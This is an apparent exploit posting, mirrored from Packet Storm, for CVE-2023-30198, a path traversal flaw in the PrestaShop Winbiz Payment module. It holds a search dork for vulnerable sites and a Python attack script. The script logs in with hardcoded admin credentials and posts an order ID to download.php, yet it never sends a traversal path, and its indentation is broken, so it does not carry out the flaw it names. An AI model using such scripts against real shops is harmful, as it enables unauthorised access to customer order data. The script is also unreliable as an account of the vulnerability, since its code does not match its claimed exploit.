Share
## https://sploitus.com/exploit?id=PACKETSTORM:173136
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory  
# Date: 2023-06-20  
# Dork: /modules/winbizpayment/downloads/download.php  
# country: Iran  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : webapps  
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html  
# Version: 17.1.3 (REQUIRED)  
# Tested on: Windows/Linux  
# CVE : CVE-2023-30198  
  
import requests  
import string  
import random  
  
# The base URL of the vulnerable site  
base_url = "http://example.com"  
  
# The URL of the login page  
login_url = base_url + "/authentication.php"  
  
# The username and password for the admin account  
username = "admin"  
password = "password123"  
  
# The URL of the vulnerable download.php file  
download_url = base_url + "/modules/winbizpayment/downloads/download.php"  
  
# The ID of the order to download  
order_id = 1234  
  
# The path to save the downloaded file  
file_path = "/tmp/order_%d.pdf" % order_id  
  
# The session cookies to use for the requests  
session_cookies = None  
  
# Generate a random string for the CSRF token  
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))  
  
# Send a POST request to the login page to authenticate as the admin user  
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}  
session = requests.Session()  
response = session.post(login_url, data=login_data)  
  
# Save the session cookies for future requests  
session_cookies = session.cookies.get_dict()  
  
# Generate a random string for the CSRF token  
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))  
  
# Send a POST request to the download.php file to download the order PDF  
download_data = {"id_order": order_id, "csrf_token": csrf_token}  
response = session.post(download_url, cookies=session_cookies, data=download_data)  
  
# Save the downloaded file to disk  
with open(file_path, "wb") as f:  
f.write(response.content)  
  
# Print a message indicating that the file has been downloaded  
print("File downloaded to %s" % file_path)